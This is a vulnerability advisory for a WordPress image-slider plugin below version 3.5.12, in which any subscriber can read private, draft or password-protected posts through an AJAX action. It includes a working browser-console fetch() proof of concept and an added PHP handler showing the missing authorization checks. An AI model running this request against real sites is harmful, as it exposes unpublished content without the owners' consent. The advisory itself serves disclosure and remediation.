wpexploit | Krzysztof Zając (CERT PL) | WPEX-ID:1AFC0E4A-F712-47D4-BF29-7719CCBBBB1B
History: Nov 23, 2023 - 12:00 a.m.

Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access


AI Score: 6.9 (Confidence: Low)
EPSS: 0.001 (Percentile: 18.1%)

Description

The plugin does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request. This allows any authenticated user, such as a subscriber, to access the content of arbitrary posts, such as private, draft and password-protected ones.

Run the command below in the web browser's developer console while on the blog as a subscriber user (4 being the ID of a private/draft/password-protected post):

fetch("/wp-admin/admin-ajax.php?action=uris_get_thumbnail", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "imageid=4",
  "method": "POST",
})
  .then((response) => {
    return response.text();
  })
  .then((data) => {
    console.log(data);
  });

The content of the post will be displayed in the rpgp_image_desc textarea.
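
The two checks the description says are missing, sketched as a hardened handler for the same AJAX action. This is an added example, not the plugin's code or its 3.5.12 fix. The handler name, EXAMPLE_SLIDE_POST_TYPE and the JSON response shape are assumptions; only the action name and the imageid parameter come from the proof of concept above.

```php
<?php
// Added example, not the plugin's own code.
// Assumption: slides are stored under a single post type; set the real one here.
const EXAMPLE_SLIDE_POST_TYPE = 'attachment';

// wp_ajax_{action} fires only for logged-in users, which still includes subscribers,
// so the handler itself has to authorize access to the requested object.
add_action( 'wp_ajax_uris_get_thumbnail', 'example_uris_get_thumbnail' );

function example_uris_get_thumbnail() {
    $post_id = isset( $_POST['imageid'] ) ? absint( wp_unslash( $_POST['imageid'] ) ) : 0;
    $post    = $post_id ? get_post( $post_id ) : null;

    // Check 1: the ID must refer to a slide, not to an arbitrary post or page.
    if ( ! $post || EXAMPLE_SLIDE_POST_TYPE !== $post->post_type ) {
        wp_send_json_error( 'Not a slide.', 404 );
    }

    // Check 2: the requesting user must be allowed to view this object.
    // 'read_post' is a meta capability: WordPress maps it to read_private_posts
    // for private posts and to edit rights for drafts owned by someone else.
    if ( ! current_user_can( 'read_post', $post_id ) ) {
        wp_send_json_error( 'Forbidden.', 403 );
    }

    // Password-protected posts are published, so 'read_post' alone passes;
    // withhold the content until the visitor has supplied the password.
    if ( post_password_required( $post ) ) {
        wp_send_json_error( 'Password required.', 403 );
    }

    // Assumed response shape; the plugin renders the text into a textarea instead.
    wp_send_json_success(
        array(
            'id'          => $post_id,
            'description' => $post->post_content,
        )
    );
}
```

Each wp_send_json_error() call terminates the request, so the post content is only reached after all three checks pass.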
